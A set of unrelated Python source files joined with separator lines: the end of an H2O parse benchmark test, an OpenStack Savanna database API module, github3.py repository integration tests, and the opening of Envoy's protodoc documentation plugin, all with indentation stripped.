# FIX! use the last (biggest?) timeoutSecs? maybe should increase since parallel
h2o_jobs.pollWaitJobs(pattern=csvFilename,
timeoutSecs=timeoutSecs, benchmarkLogging=benchmarkLogging)
# for getting the MB/sec closer to 'right'
totalBytes += totalBytes2 + totalBytes3
elapsed = time.time() - start
h2o.check_sandbox_for_errors()
if totalBytes is not None:
fileMBS = (totalBytes/1e6)/elapsed
l = '{!s} jvms, {!s}GB heap, {:s} {:s} {:6.2f} MB/sec for {:.2f} secs'.format(
len(h2o.nodes), tryHeap, csvFilepattern, csvFilename, fileMBS, elapsed)
print l
h2o.cloudPerfH2O.message(l)
print "Parse result['destination_key']:", parseResult['destination_key']
# BUG here?
if not noPoll:
pass
# We should be able to see the parse result?
# h2o_cmd.check_enums_from_inspect(parseResult)
# the nflx data doesn't have a small enough # of classes in any col
# use exec to randomFilter out 200 rows for a quick RF. that should work for everyone?
origKey = parseResult['destination_key']
# execExpr = 'a = randomFilter('+origKey+',200,12345678)'
execExpr = 'a = slice('+origKey+',1,200)'
# h2e.exec_expr(h2o.nodes[0], execExpr, "a", timeoutSecs=30)
# runRF takes the parseResult directly
newParseKey = {'destination_key': 'a'}
print "\n" + csvFilepattern
# poker and the water.UDP.set3(UDP.java) fail issue..
# constrain depth to 25
print "Temporarily hacking to do nothing instead of RF on the parsed file"
### RFview = h2o_cmd.runRF(trees=1,depth=25,parseResult=newParseKey, timeoutSecs=timeoutSecs)
### h2b.browseJsonHistoryAsUrlLastMatch("RFView")
#**********************************************************************************
# Do GLM too
# Argument case error: Value 0.0 is not between 12.0 and 9987.0 (inclusive)
if DO_GLM:
# these are all the columns that are enums in the dataset...too many for GLM!
x = range(542) # don't include the output column
# remove the output too! (378)
for i in [3, 4, 5, 6, 7, 8, 9, 10, 11, 14, 16, 17, 18, 19, 20, 424, 425, 426, 540, 541, 378]:
x.remove(i)
x = ",".join(map(str,x))
GLMkwargs = {'x': x, 'y': 378, 'case': 15, 'case_mode': '>',
'max_iter': 10, 'n_folds': 1, 'alpha': 0.2, 'lambda': 1e-5}
start = time.time()
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **GLMkwargs)
h2o_glm.simpleCheckGLM(self, glm, None, **GLMkwargs)
elapsed = time.time() - start
h2o.check_sandbox_for_errors()
l = '{:d} jvms, {:d}GB heap, {:s} {:s} GLM: {:6.2f} secs'.format(
len(h2o.nodes), tryHeap, csvFilepattern, csvFilename, elapsed)
print l
h2o.cloudPerfH2O.message(l)
#**********************************************************************************
# print "Waiting 30 secs"
# time.sleep(30)
h2o_cmd.checkKeyDistribution()
h2i.delete_keys_from_import_result(pattern=csvFilename, importResult=importResult)
h2o.nodes[0].remove_all_keys()
### time.sleep(3600)
### h2o.tear_down_cloud()
if not h2o.localhost:
print "Waiting 30 secs before building cloud again (sticky ports?)"
### time.sleep(30)
sys.stdout.write('.')
sys.stdout.flush()
if __name__ == '__main__':
h2o.unit_main()
|
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines interface for DB access.
Functions in this module are imported into the savanna.db namespace. Call these
functions from savanna.db namespace, not the savanna.db.api namespace.
All functions in this module return objects that implement a dictionary-like
interface.
**Related Flags**
:db_backend: string to lookup in the list of LazyPluggable backends.
`sqlalchemy` is the only supported backend right now.
:sql_connection: string specifying the sqlalchemy connection to use, like:
`sqlite:///var/lib/savanna/savanna.sqlite`.
"""
from oslo.config import cfg
from savanna.openstack.common.db import api as db_api
from savanna.openstack.common import log as logging
CONF = cfg.CONF
_BACKEND_MAPPING = {
'sqlalchemy': 'savanna.db_new.sqlalchemy.api',
}
IMPL = db_api.DBAPI(backend_mapping=_BACKEND_MAPPING)
LOG = logging.getLogger(__name__)
def setup_db():
"""Set up database, create tables, etc.
Return True on success, False otherwise
"""
return IMPL.setup_db()
def drop_db():
"""Drop database.
Return True on success, False otherwise
"""
return IMPL.drop_db()
## Helpers for building constraints / equality checks
def constraint(**conditions):
"""Return a constraint object suitable for use with some updates."""
return IMPL.constraint(**conditions)
def equal_any(*values):
"""Return an equality condition object suitable for use in a constraint.
Equal_any conditions require that a model object's attribute equal any
one of the given values.
"""
return IMPL.equal_any(*values)
def not_equal(*values):
"""Return an inequality condition object suitable for use in a constraint.
Not_equal conditions require that a model object's attribute differs from
all of the given values.
"""
return IMPL.not_equal(*values)
def to_dict(func):
def decorator(*args, **kwargs):
res = func(*args, **kwargs)
if isinstance(res, list):
return [item.to_dict() for item in res]
if res:
return res.to_dict()
else:
return None
return decorator
## Cluster ops
@to_dict
def cluster_get(context, cluster):
"""Return the cluster or None if it does not exist."""
return IMPL.cluster_get(context, cluster)
@to_dict
def cluster_get_all(context):
"""Get all clusters."""
return IMPL.cluster_get_all(context)
@to_dict
def cluster_create(context, values):
"""Create a cluster from the values dictionary."""
return IMPL.cluster_create(context, values)
@to_dict
def cluster_update(context, cluster, values):
"""Set the given properties on cluster and update it."""
return IMPL.cluster_update(context, cluster, values)
def cluster_destroy(context, cluster):
"""Destroy the cluster or raise if it does not exist."""
IMPL.cluster_destroy(context, cluster)
## Node Group ops
@to_dict
def node_group_add(context, cluster, values):
"""Create a Node Group from the values dictionary."""
return IMPL.node_group_add(context, cluster, values)
@to_dict
def node_group_update(context, node_group, values):
"""Set the given properties on node_group and update it."""
return IMPL.node_group_update(context, node_group, values)
def node_group_remove(context, node_group):
"""Destroy the node_group or raise if it does not exist."""
IMPL.node_group_remove(context, node_group)
## Instance ops
@to_dict
def instance_add(context, node_group, values):
"""Create an Instance from the values dictionary."""
return IMPL.instance_add(context, node_group, values)
@to_dict
def instance_update(context, instance, values):
"""Set the given properties on Instance and update it."""
return IMPL.instance_update(context, instance, values)
def instance_remove(context, instance):
"""Destroy the Instance or raise if it does not exist."""
IMPL.instance_remove(context, instance)
## Cluster Template ops
@to_dict
def cluster_template_get(context, cluster_template):
"""Return the cluster_template or None if it does not exist."""
return IMPL.cluster_template_get(context, cluster_template)
@to_dict
def cluster_template_get_all(context):
"""Get all cluster_templates."""
return IMPL.cluster_template_get_all(context)
@to_dict
def cluster_template_create(context, values):
"""Create a cluster_template from the values dictionary."""
return IMPL.cluster_template_create(context, values)
def cluster_template_destroy(context, cluster_template):
"""Destroy the cluster_template or raise if it does not exist."""
IMPL.cluster_template_destroy(context, cluster_template)
## Node Group Template ops
@to_dict
def node_group_template_get(context, node_group_template):
"""Return the Node Group Template or None if it does not exist."""
return IMPL.node_group_template_get(context, node_group_template)
@to_dict
def node_group_template_get_all(context):
"""Get all Node Group Templates."""
return IMPL.node_group_template_get_all(context)
@to_dict
def node_group_template_create(context, values):
"""Create a Node Group Template from the values dictionary."""
return IMPL.node_group_template_create(context, values)
def node_group_template_destroy(context, node_group_template):
"""Destroy the Node Group Template or raise if it does not exist."""
IMPL.node_group_template_destroy(context, node_group_template)
## Data Source ops
@to_dict
def data_source_get(context, data_source):
"""Return the Data Source or None if it does not exist."""
return IMPL.data_source_get(context, data_source)
@to_dict
def data_source_get_all(context):
"""Get all Data Sources."""
return IMPL.data_source_get_all(context)
@to_dict
def data_source_create(context, values):
"""Create a Data Source from the values dictionary."""
return IMPL.data_source_create(context, values)
def data_source_destroy(context, data_source):
"""Destroy the Data Source or raise if it does not exist."""
IMPL.data_source_destroy(context, data_source)
## Jobs ops
@to_dict
def job_get(context, job):
"""Return the Job or None if it does not exist."""
return IMPL.job_get(context, job)
@to_dict
def job_get_all(context):
"""Get all Jobs."""
return IMPL.job_get_all(context)
@to_dict
def job_create(context, values):
"""Create a Job from the values dictionary."""
return IMPL.job_create(context, values)
def job_destroy(context, job):
"""Destroy the Job or raise if it does not exist."""
IMPL.job_destroy(context, job)
|
|
"""Integration tests for Repositories."""
import github3
import github3.exceptions as exc
import pytest
from . import helper
class TestRepository(helper.IntegrationHelper):
"""Integration tests for the Repository object."""
def test_add_collaborator(self):
"""Test the ability to add a collaborator to a repository."""
self.basic_login()
cassette_name = self.cassette_name('add_collaborator')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('testgh3', 'collaborators')
assert repository
assert repository.add_collaborator('sigmavirus24')
def test_assignees(self):
"""Test the ability to retrieve assignees of issues on a repo."""
cassette_name = self.cassette_name('assignees')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('kennethreitz', 'requests')
assert repository is not None
for assignee in repository.assignees():
assert isinstance(assignee, github3.users.User)
def test_branch(self):
"""Test the ability to retrieve a single branch in a repository."""
cassette_name = self.cassette_name('branch')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
branch = repository.branch('develop')
assert isinstance(branch, github3.repos.branch.Branch)
assert 'enabled' in branch.protection
def test_branches(self):
"""Test the ability to retrieve the branches in a repository."""
cassette_name = self.cassette_name('branches')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for branch in repository.branches():
assert isinstance(branch, github3.repos.branch.Branch)
def test_protected_branches(self):
"""Test the ability to retrieve protected branches in a repository."""
cassette_name = self.cassette_name('branches_protected')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
assert all(b.protection['enabled'] is True
for b in repository.branches(protected=True))
def test_code_frequency(self):
"""Test the ability to retrieve the code frequency in a repo."""
cassette_name = self.cassette_name('code_frequency')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for code_freq in repository.code_frequency():
assert isinstance(code_freq, list)
assert len(code_freq) > 0
def test_collaborators(self):
"""Test the ability to retrieve the collaborators on a repository."""
cassette_name = self.cassette_name('collaborators')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for collaborator in repository.collaborators():
assert isinstance(collaborator, github3.users.User)
def test_comments(self):
"""Test the ability to retrieve comments on a repository."""
cassette_name = self.cassette_name('comments')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for comment in repository.comments():
assert isinstance(comment, github3.repos.comment.RepoComment)
def test_commit_activity(self):
"""Test the ability to retrieve commit activity on a repo."""
cassette_name = self.cassette_name('commit_activity')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for activity in repository.commit_activity():
assert isinstance(activity, dict)
def test_commits(self):
"""Test the ability to retrieve commits on a repository."""
cassette_name = self.cassette_name('commits')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for commit in repository.commits(number=25):
assert isinstance(commit, github3.repos.commit.RepoCommit)
def test_contributor_statistics(self):
"""Test the ability to retrieve contributor statistics for a repo."""
cassette_name = self.cassette_name('contributor_statistics')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for stat in repository.contributor_statistics():
assert isinstance(stat, github3.repos.stats.ContributorStats)
def test_contributors(self):
"""Test the ability to retrieve the contributors to a repository."""
cassette_name = self.cassette_name('contributors')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for contributor in repository.contributors():
assert isinstance(contributor, github3.users.User)
assert isinstance(contributor.contributions, int)
def test_create_empty_blob(self):
"""Test the ability to create an empty blob on a repository."""
self.basic_login()
cassette_name = self.cassette_name('create_empty_blob')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('github3py', 'fork_this')
assert repository is not None
blob_sha = repository.create_blob('', 'utf-8')
assert blob_sha is not None
assert blob_sha != ''
def test_create_deployment(self):
"""Test the ability to create a deployment for a repository."""
self.basic_login()
cassette_name = self.cassette_name('create_deployment')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
deployment = repository.create_deployment('0.8.2')
assert isinstance(deployment, github3.repos.deployment.Deployment)
def test_create_release(self):
"""Test the ability to create a release on a repository."""
self.token_login()
cassette_name = self.cassette_name('create_release')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'charade')
assert repository is not None
release = repository.create_release(
'1.0.3.test', 'f1d4e150be7070adfbbdca164328d69723e096ec',
'Test release'
)
assert isinstance(release, github3.repos.release.Release)
def test_create_tag(self):
"""Test the ability to create an annotated tag on a repository."""
self.basic_login()
cassette_name = self.cassette_name('create_tag')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('github3py', 'fork_this')
assert repository is not None
tag = repository.create_tag(
tag='tag-name',
message='Test annotated tag creation',
sha='5145c9682d46d714c31ae0b5fbe30a83039a96e5',
obj_type='commit',
tagger={
'name': 'Ian Cordasco',
'email': '[email protected]',
'date': '2015-11-01T14:09:00Z'
}
)
assert isinstance(tag, github3.git.Tag)
def test_delete(self):
"""Test that a repository can be deleted."""
self.basic_login()
cassette_name = self.cassette_name('delete')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'my-new-repo')
assert repository is not None
assert repository.delete() is True
def test_deployment(self):
"""Test that a deployment can be retrieved by its id."""
cassette_name = self.cassette_name('deployment')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
deployment = repository.deployment(797)
assert isinstance(deployment, github3.repos.deployment.Deployment)
def test_deployments(self):
"""Test that a repository's deployments may be retrieved."""
cassette_name = self.cassette_name('deployments')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for d in repository.deployments():
assert isinstance(d, github3.repos.deployment.Deployment)
def test_directory_contents(self):
"""Test that a directory's contents can be retrieved."""
cassette_name = self.cassette_name('directory_contents')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
contents = repository.directory_contents('github3/search/')
for (filename, content) in contents:
assert content.name == filename
assert isinstance(content, github3.repos.contents.Contents)
assert content.content is None
assert content.decoded is None
def test_events(self):
"""Test that a user can iterate over the events from a repository."""
cassette_name = self.cassette_name('events')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
events = list(repository.events(number=100))
assert len(events) > 0
for event in events:
assert isinstance(event, github3.events.Event)
def test_file_contents(self):
"""Test that a file's contents can be retrieved."""
cassette_name = self.cassette_name('file_contents')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
contents = repository.file_contents('github3/repos/repo.py')
assert isinstance(contents, github3.repos.contents.Contents)
assert contents.content is not None
assert contents.decoded is not None
def test_forks(self):
"""Test that a user can iterate over the forks of a repository."""
cassette_name = self.cassette_name('forks')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
forks = list(repository.forks())
assert len(forks) > 0
for fork in forks:
assert isinstance(fork, github3.repos.Repository)
def test_hooks(self):
"""Test that a user can iterate over the hooks of a repository."""
self.basic_login()
cassette_name = self.cassette_name('hooks')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
hooks = list(repository.hooks())
assert len(hooks) > 0
for hook in hooks:
assert isinstance(hook, github3.repos.hook.Hook)
def test_ignore(self):
"""Test that a user can ignore the notifications on a repository."""
self.basic_login()
cassette_name = self.cassette_name('ignore')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('jnewland',
'gmond_python_modules')
assert repository is not None
subscription = repository.ignore()
assert subscription.ignored is True
def test_issue_events(self):
"""Test that a user can iterate over issue events in a repo."""
cassette_name = self.cassette_name('issue_events')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
events = list(repository.issue_events(number=50))
for ev in events:
assert isinstance(ev, github3.issues.event.IssueEvent)
def test_issues_sorts_ascendingly(self):
"""Test that issues will be returned in ascending order."""
cassette_name = self.cassette_name('issues_ascending')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
issues = list(repository.issues(direction='asc'))
assert len(issues) > 0
last_issue = None
for issue in issues:
assert isinstance(issue, github3.issues.Issue)
if last_issue:
assert last_issue.number < issue.number
last_issue = issue
def test_issues_accepts_state_all(self):
"""Test that the state parameter accets 'all'."""
cassette_name = self.cassette_name('issues_state_all')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
for issue in repository.issues(state='all'):
assert issue.state in ('open', 'closed')
def test_key(self):
"""Test the retrieval of a single key."""
self.basic_login()
cassette_name = self.cassette_name('key')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
key = repository.key(8820641)
assert isinstance(key, github3.users.Key)
def test_keys(self):
"""Test that the user can retrieve all deploy keys."""
self.basic_login()
cassette_name = self.cassette_name('keys')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
keys = list(repository.keys())
assert len(keys) > 0
for key in keys:
assert isinstance(key, github3.users.Key)
def test_labels(self):
"""Test that a user can retrieve a repository's labels."""
cassette_name = self.cassette_name('labels')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
labels = list(repository.labels())
assert len(labels) > 0
for label in labels:
assert isinstance(label, github3.issues.label.Label)
def test_languages(self):
"""Test that a repository's languages can be retrieved."""
cassette_name = self.cassette_name('languages')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for l in repository.languages():
assert 'ETag' not in l
assert 'Last-Modified' not in l
assert isinstance(l, tuple)
def test_license(self):
"""Test that a repository's license can be retrieved."""
cassette_name = self.cassette_name('license')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
license = repository.license()
assert isinstance(license, github3.licenses.License)
def test_milestone(self):
"""Test the ability to retrieve a milestone on a repository."""
cassette_name = self.cassette_name('milestone')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
milestone = repository.milestone(7)
assert isinstance(milestone, github3.issues.milestone.Milestone)
def test_milestones(self):
"""Test the ability to retrieve the milestones in a repository."""
cassette_name = self.cassette_name('milestones')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
milestones = list(repository.milestones())
assert len(milestones) > 0
for milestone in milestones:
assert isinstance(milestone, github3.issues.milestone.Milestone)
def test_network_events(self):
"""Test that a user can retrieve the events of a repo's network."""
cassette_name = self.cassette_name('network_events')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
events = list(repository.network_events())
assert len(events) > 0
for event in events:
assert isinstance(event, github3.events.Event)
def test_notifications(self):
"""Test that a user can retrieve their repo notifications."""
self.basic_login()
cassette_name = self.cassette_name('notifications')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
notifications = list(repository.notifications())
assert len(notifications) > 0
for notification in notifications:
assert isinstance(notification, github3.notifications.Thread)
def test_pull_requests(self):
"""Test that a user can retrieve the pull requests from a repo."""
cassette_name = self.cassette_name('pull_requests')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
pulls = list(repository.pull_requests())
assert len(pulls) > 0
for pull in pulls:
assert isinstance(pull, github3.pulls.PullRequest)
def test_pull_requests_accepts_sort_and_direction(self):
"""Test that pull_requests now takes a sort parameter."""
cassette_name = self.cassette_name('pull_requests_accept_sort')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
last_pr = None
for pr in repository.pull_requests(sort='updated',
direction='asc'):
assert pr is not None
if last_pr:
assert last_pr.updated_at < pr.updated_at
last_pr = pr
def test_release(self):
"""Test the ability to retrieve a single release."""
cassette_name = self.cassette_name('release')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
release = repository.release(76677)
assert isinstance(release, github3.repos.release.Release)
def test_release_latest(self):
"""Test the ability to retrieve the latest release."""
cassette_name = self.cassette_name('release_latest')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
release = repository.release_latest()
assert isinstance(release, github3.repos.release.Release)
def test_release_from_tag(self):
"""Test the ability to retrieve a release by tag name"""
cassette_name = self.cassette_name('release_from_tag')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
release = repository.release_from_tag('v0.7.1')
assert isinstance(release, github3.repos.release.Release)
def test_releases(self):
"""Test the ability to iterate over releases on a repository."""
cassette_name = self.cassette_name('releases')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
for release in repository.releases():
assert isinstance(release, github3.repos.release.Release)
def test_refs(self):
"""Test the ability to retrieve the references from a repository."""
cassette_name = self.cassette_name('refs')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
references = list(repository.refs())
assert len(references) > 0
for ref in references:
assert isinstance(ref, github3.git.Reference)
def test_refs_raises_unprocessable_exception(self):
"""Verify github3.exceptions.UnprocessableResponseBody is raised."""
cassette_name = self.cassette_name('invalid_refs')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
with pytest.raises(exc.UnprocessableResponseBody):
list(repository.refs('heads/develop'))
def test_stargazers(self):
"""Test the ability to retrieve the stargazers on a repository."""
cassette_name = self.cassette_name('stargazers')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
stargazers = list(repository.stargazers())
assert len(stargazers) > 0
for user in stargazers:
assert isinstance(user, github3.users.User)
def test_statuses(self):
"""Test the ability to retrieve a commit's statuses."""
cassette_name = self.cassette_name('statuses')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'github3.py')
assert repository is not None
statuses = list(repository.statuses(
'0cea3860f91717272a5edb3961e9723b70769084'
))
assert len(statuses) > 0
for status in statuses:
assert isinstance(status, github3.repos.status.Status)
def test_subscribers(self):
"""Test the ability to retrieve a repository's subscribers."""
cassette_name = self.cassette_name('subscribers')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
subscribers = list(repository.subscribers())
assert len(subscribers) > 0
for user in subscribers:
assert isinstance(user, github3.users.User)
def test_subscription(self):
"""Test the ability to subscribe to a repository's notifications."""
self.basic_login()
cassette_name = self.cassette_name('subscription')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('vcr', 'vcr')
assert repository is not None
subscription = repository.subscribe()
assert subscription.subscribed is True
def test_tags(self):
"""Test the ability to retrieve a repository's tags."""
cassette_name = self.cassette_name('tags')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('sigmavirus24', 'betamax')
assert repository is not None
tags = list(repository.tags())
assert len(tags) > 0
for tag in tags:
assert isinstance(tag, github3.repos.tag.RepoTag)
def test_teams(self):
"""Test the ability to retrieve teams assigned to a repo."""
self.basic_login()
cassette_name = self.cassette_name('teams')
with self.recorder.use_cassette(cassette_name):
repository = self.gh.repository('github3py', 'github3.py')
assert repository is not None
teams = list(repository.teams())
assert len(teams) > 0
for team in teams:
assert isinstance(team, github3.orgs.Team)
|
|
# protoc plugin to map from FileDescriptorProtos to Envoy doc style RST.
# See https://github.com/google/protobuf/blob/master/src/google/protobuf/descriptor.proto
# for the underlying protos mentioned in this file. See
# http://www.sphinx-doc.org/en/stable/rest.html for Sphinx RST syntax.
from collections import defaultdict
import cProfile
import functools
import os
import pstats
import StringIO
import sys
import re
from google.protobuf.compiler import plugin_pb2
from validate import validate_pb2
# Namespace prefix for Envoy core APIs.
ENVOY_API_NAMESPACE_PREFIX = '.envoy.api.v2.'
# Namespace prefix for Envoy top-level APIs.
ENVOY_PREFIX = '.envoy.'
# Namespace prefix for WKTs.
WKT_NAMESPACE_PREFIX = '.google.protobuf.'
# Namespace prefix for RPCs.
RPC_NAMESPACE_PREFIX = '.google.rpc.'
# http://www.fileformat.info/info/unicode/char/2063/index.htm
UNICODE_INVISIBLE_SEPARATOR = u'\u2063'
# Key-value annotation regex.
ANNOTATION_REGEX = re.compile('\[#([\w-]+?):(.*?)\]\s?', re.DOTALL)
# Page/section titles with special prefixes in the proto comments
DOC_TITLE_ANNOTATION = 'protodoc-title'
# Not implemented yet annotation on leading comments, leading to insertion of
# warning on field.
NOT_IMPLEMENTED_WARN_ANNOTATION = 'not-implemented-warn'
# Not implemented yet annotation on leading comments, leading to hiding of
# field.
NOT_IMPLEMENTED_HIDE_ANNOTATION = 'not-implemented-hide'
# Comment. Just used for adding text that will not go into the docs at all.
COMMENT_ANNOTATION = 'comment'
# proto compatibility status.
PROTO_STATUS_ANNOTATION = 'proto-status'
# Where v2 differs from v1..
V2_API_DIFF_ANNOTATION = 'v2-api-diff'
VALID_ANNOTATIONS = set([
DOC_TITLE_ANNOTATION,
NOT_IMPLEMENTED_WARN_ANNOTATION,
NOT_IMPLEMENTED_HIDE_ANNOTATION,
V2_API_DIFF_ANNOTATION,
COMMENT_ANNOTATION,
PROTO_STATUS_ANNOTATION,
])
# These can propagate from file scope to message/enum scope (and be overridden).
INHERITED_ANNOTATIONS = set([
PROTO_STATUS_ANNOTATION,
])
# Template for data plane API URLs.
# TODO(htuch): Add the ability to build a permalink by feeding a hash
# to the tool or inferring from local tree (only really make sense in CI).
DATA_PLANE_API_URL_FMT = 'https://github.com/envoyproxy/envoy/blob/master/api/%s#L%d'
class ProtodocError(Exception):
"""Base error class for the protodoc module."""
def FormatCommentWithAnnotations(s, annotations, type_name):
if NOT_IMPLEMENTED_WARN_ANNOTATION in annotations:
s += '\n.. WARNING::\n Not implemented yet\n'
if V2_API_DIFF_ANNOTATION in annotations:
s += '\n.. NOTE::\n **v2 API difference**: ' + annotations[V2_API_DIFF_ANNOTATION] + '\n'
if type_name == 'message' or type_name == 'enum':
if PROTO_STATUS_ANNOTATION in annotations:
status = annotations[PROTO_STATUS_ANNOTATION]
if status not in ['frozen', 'draft', 'experimental']:
raise ProtodocError('Unknown proto status: %s' % status)
if status == 'draft' or status == 'experimental':
s += ('\n.. WARNING::\n This %s type has :ref:`%s '
'<config_overview_v2_status>` status.\n' % (type_name, status))
return s
def ExtractAnnotations(s, inherited_annotations=None, type_name='file'):
"""Extract annotations from a given comment string.
Args:
s: string that may contains annotations.
inherited_annotations: annotation map from file-level inherited annotations
(or None) if this is a file-level comment.
Returns:
Pair of string with with annotations stripped and annotation map.
"""
annotations = {
k: v
for k, v in (inherited_annotations or {}).items()
if k in INHERITED_ANNOTATIONS
}
# Extract annotations.
groups = re.findall(ANNOTATION_REGEX, s)
# Remove annotations.
without_annotations = re.sub(ANNOTATION_REGEX, '', s)
for group in groups:
annotation = group[0]
if annotation not in VALID_ANNOTATIONS:
raise ProtodocError('Unknown annotation: %s' % annotation)
annotations[group[0]] = group[1].lstrip()
return FormatCommentWithAnnotations(without_annotations, annotations,
type_name), annotations
class SourceCodeInfo(object):
"""Wrapper for SourceCodeInfo proto."""
def __init__(self, name, source_code_info):
self._name = name
self._proto = source_code_info
self._leading_comments = {str(location.path): location.leading_comments for location in self._proto.location}
self._file_level_comment = None
@property
def file_level_comment(self):
"""Obtain inferred file level comment."""
if self._file_level_comment:
return self._file_level_comment
comment = ''
earliest_detached_comment = max(
max(location.span) for location in self._proto.location)
for location in self._proto.location:
if location.leading_detached_comments and location.span[0] < earliest_detached_comment:
comment = StripLeadingSpace(''.join(
location.leading_detached_comments)) + '\n'
earliest_detached_comment = location.span[0]
self._file_level_comment = comment
return comment
def LeadingCommentPathLookup(self, path, type_name):
"""Lookup leading comment by path in SourceCodeInfo.
Args:
path: a list of path indexes as per
https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto#L717.
type_name: name of type the comment belongs to.
Returns:
Pair of attached leading comment and Annotation objects, where there is a
leading comment
otherwise ('', []).
"""
leading_comment = self._leading_comments.get(str(path), None)
if leading_comment is not None:
_, file_annotations = ExtractAnnotations(self.file_level_comment)
return ExtractAnnotations(
StripLeadingSpace(leading_comment) + '\n', file_annotations,
type_name)
return '', []
def GithubUrl(self, path):
"""Obtain data plane API Github URL by path from SourceCodeInfo.
Args:
path: a list of path indexes as per
https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto#L717.
Returns:
A string with a corresponding data plane API GitHub Url.
"""
for location in self._proto.location:
if location.path == path:
return DATA_PLANE_API_URL_FMT % (self._name, location.span[0])
return ''
class TypeContext(object):
"""Contextual information for a message/field.
Provides information around namespaces and enclosing types for fields and
nested messages/enums.
"""
def __init__(self, source_code_info, name):
# SourceCodeInfo as per
# https://github.com/google/protobuf/blob/a08b03d4c00a5793b88b494f672513f6ad46a681/src/google/protobuf/descriptor.proto.
self.source_code_info = source_code_info
